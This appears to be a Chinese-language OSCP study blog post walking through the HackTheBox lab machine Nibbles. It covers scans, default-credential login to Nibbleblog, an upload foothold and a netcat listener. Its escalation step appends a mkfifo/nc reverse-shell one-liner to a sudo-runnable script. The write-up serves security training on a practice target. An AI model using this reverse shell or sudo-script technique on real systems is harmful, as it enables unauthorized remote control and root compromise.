OSCP备考_0x03_HackThBox靶机_Linux_nibbles

Ethan医生3个月前靶场96

信息收集

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.193.19 (扫描UDP)



http://10.129.193.19/,F12发现

image.png

image.png

应该有入口点


image.png



爆破路径看看有没有啥


gobuster dir -u http://10.129.193.19/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -t 50

gobuster dir -u http://10.129.193.19/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt -t 50

image.png

上面信息可以查看到版本

image.png

有上传文件漏洞,查看怎样利用反弹SHELL

admin/nibbles 登入账号密吗,由于原本爆破导致机器禁止访问

image.png

找到My image进行上传文件

image.png

然后监听nc -lvnp 3333


image.png

开始提权

sudo -l发现

image.png

然后开始创建monitor.sh

poc:echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.31 3334 >/tmp/f' | tee -a /home/nibbler/personal/stuff/monitor.sh

image.png

标签: OSCP

相关文章

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.73.179 (扫描TCP)nmap -sU --top-ports 100 10.129.73....

 OSCP备考_0x35_HackThBox靶机_Ready

OSCP备考_0x35_HackThBox靶机_Ready

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.92.20 (扫描TCP)http://10.129.92.20:5080/dashbo...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

 OSCP备考_0x15_HackThBox靶机_Linux_networked

OSCP备考_0x15_HackThBox靶机_Linux_networked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x34_HackThBox靶机_time

OSCP备考_0x34_HackThBox靶机_time

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x28_HackThBox靶机_Linux_blunder

OSCP备考_0x28_HackThBox靶机_Linux_blunder

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。